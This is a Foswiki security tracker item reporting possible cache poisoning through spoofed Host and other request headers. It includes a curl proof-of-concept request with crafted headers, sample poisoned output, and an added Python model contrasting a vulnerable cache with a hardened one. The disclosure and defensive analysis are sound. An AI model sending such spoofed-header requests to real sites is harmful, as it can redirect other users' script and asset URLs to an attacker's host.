
Item13797: Possible cache poisoning

Priority: Security
Current State: No Action Required
Released In: n/a
Target Release: n/a
Applies To: Engine
Component:
Branches:
Reported By: JozefMojzis
Waiting For:
Last Change By: GeorgeClark
With some combination of the web-server configuration (which headers are allowed to pass) and other things, there is a possibility of attacking Foswiki's cache:

For example, the request:

curl --header "Referrer: EVILREF" --header "Host: EVILHOST" --header "Evilhead: EVILHEAD" http://foswiki.org/Sandbox/WebHome

could poison the cache (depending on the web-server config, i.e. how it allows (accepts) the Host: and other headers).

With the wrong server config it could result in:

...script class='script JQUERYPLUGIN::FOSWIKI::PREFERENCES foswikiPreferences' type='text/json' ...{
   "SYSTEMWEB" : "System",
   "SCRIPTURLPATH" : "/bin",
   "USERNAME" : "guest",
   "PUBURLPATH" : "/pub",
   "SERVERTIME" : "05 Oct 2015 - 22:33",
   "PUBURL" : "http://EVILHOST/pub",            #NOTE THIS
   "WIKIUSERNAME" : "Main.WikiGuest",
   "WIKINAME" : "WikiGuest",
   "WEB" : "Sandbox",
   "SKIN" : "natedit,pattern",
   "TOPIC" : "SuSu",
   "NAMEFILTER" : "[\\\\\\s\\*?~^\\$@%`\"'\\x26;|\\x3c>\\[\\]#\\x00-\\x1f]",
   "SCRIPTURL" : "http://EVILHOST/bin",    #ALSO THIS
   "USERSWEB" : "Main",
   "SCRIPTSUFFIX" : ""
}

Maybe it isn't a real threat, but it is better to know about it.

The reason: Foswiki blindly outputs any HTTP_\w+ environment variable. For example, %ENV{HTTP_EVILHEAD}% or %ENV{HTTP_REFERRER}% in some topic could output (and cache) the crafted header values.

-- JozefMojzis - 05 Oct 2015
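The mechanism in the report, modelled as an added example (my code, not Foswiki's; the host name, topic text, class and function names are constructed for illustration). Two things make the attack work: the cache key is the request path alone while the rendered output depends on unkeyed inputs (the Host header and anything reachable through %ENV{HTTP_*}%), and the Host header is trusted as the origin for PUBURL and SCRIPTURL. The vulnerable cache below reproduces the PUBURL/SCRIPTURL values shown in the report; the hardened variant validates Host against a configured canonical name before the cache is consulted and refuses to store any page whose output depended on request headers.

```python
"""Toy model of the cache-poisoning path in the report above (constructed
example, not Foswiki code). Both caches are in-memory dicts."""
import re
from dataclasses import dataclass, field

CANONICAL_HOST = "foswiki.example.org"  # assumption: the site's configured host name

# Constructed topic text using the macros the report mentions.
TOPIC_TEXT = "Referrer was %ENV{HTTP_REFERRER}% and custom header %ENV{HTTP_EVILHEAD}%."
ENV_MACRO = re.compile(r"%ENV\{(HTTP_\w+)\}%")


@dataclass
class Request:
    path: str
    headers: dict = field(default_factory=dict)

    def cgi_env(self):
        """CGI-style environment: header 'Evilhead: x' becomes HTTP_EVILHEAD=x."""
        return {"HTTP_" + k.upper().replace("-", "_"): v for k, v in self.headers.items()}


def render_vulnerable(req):
    """Trusts Host and expands every HTTP_* macro from the request headers."""
    host = req.headers.get("Host", CANONICAL_HOST)
    env = req.cgi_env()
    body = ENV_MACRO.sub(lambda m: env.get(m.group(1), ""), TOPIC_TEXT)
    return {"PUBURL": f"http://{host}/pub", "SCRIPTURL": f"http://{host}/bin", "body": body}


class VulnerableCache:
    """Keyed on path only: the first requester's headers shape what everyone gets."""

    def __init__(self):
        self.store = {}

    def get(self, req):
        if req.path not in self.store:
            self.store[req.path] = render_vulnerable(req)
        return self.store[req.path]


def validate_host(req):
    """Reject anything but the canonical host before the cache is consulted."""
    host = req.headers.get("Host", "").lower()
    if host != CANONICAL_HOST:
        raise ValueError(f"unexpected Host header: {host!r}")
    return CANONICAL_HOST


def render_hardened(req, host):
    """URLs come from the validated host; a page that reads headers is uncacheable."""
    env = req.cgi_env()
    depends_on_headers = ENV_MACRO.search(TOPIC_TEXT) is not None
    body = ENV_MACRO.sub(lambda m: env.get(m.group(1), ""), TOPIC_TEXT)
    page = {"PUBURL": f"http://{host}/pub", "SCRIPTURL": f"http://{host}/bin", "body": body}
    return page, not depends_on_headers


class HardenedCache:
    """Keyed on (host, path); only header-independent pages are stored."""

    def __init__(self):
        self.store = {}

    def get(self, req):
        host = validate_host(req)
        key = (host, req.path)
        if key in self.store:
            return self.store[key]
        page, cacheable = render_hardened(req, host)
        if cacheable:
            self.store[key] = page
        return page


def demo():
    """Replay the report's request, then a victim's plain request, against both caches."""
    path = "/Sandbox/WebHome"
    attacker = Request(path, {"Host": "EVILHOST", "Referrer": "EVILREF", "Evilhead": "EVILHEAD"})
    insider = Request(path, {"Host": CANONICAL_HOST, "Evilhead": "EVILHEAD"})
    victim = Request(path, {"Host": CANONICAL_HOST})

    vuln = VulnerableCache()
    vuln.get(attacker)            # primes the cache with attacker-controlled values
    poisoned = vuln.get(victim)   # the victim is served those values

    hard = HardenedCache()
    try:
        hard.get(attacker)
        bad_host_rejected = False
    except ValueError:
        bad_host_rejected = True
    hard.get(insider)             # correct Host but header-dependent output: not stored
    clean = hard.get(victim)
    return {"poisoned": poisoned, "bad_host_rejected": bad_host_rejected,
            "clean": clean, "hardened_cache_entries": len(hard.store)}
```

Running demo() shows the vulnerable cache handing the victim PUBURL http://EVILHOST/pub and a body containing EVILREF and EVILHEAD, while the hardened cache rejects the EVILHOST request outright, renders the header-dependent topic per request without storing it, and ends with zero cache entries. The corresponding checks on a real deployment are the ones the report points at: confirm the web server rejects or rewrites Host values it does not serve before the request reaches Foswiki, and look through the topics and templates of cached webs for %ENV{HTTP_ macros.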
Topic revision: r2 - 03 Oct 2016, GeorgeClark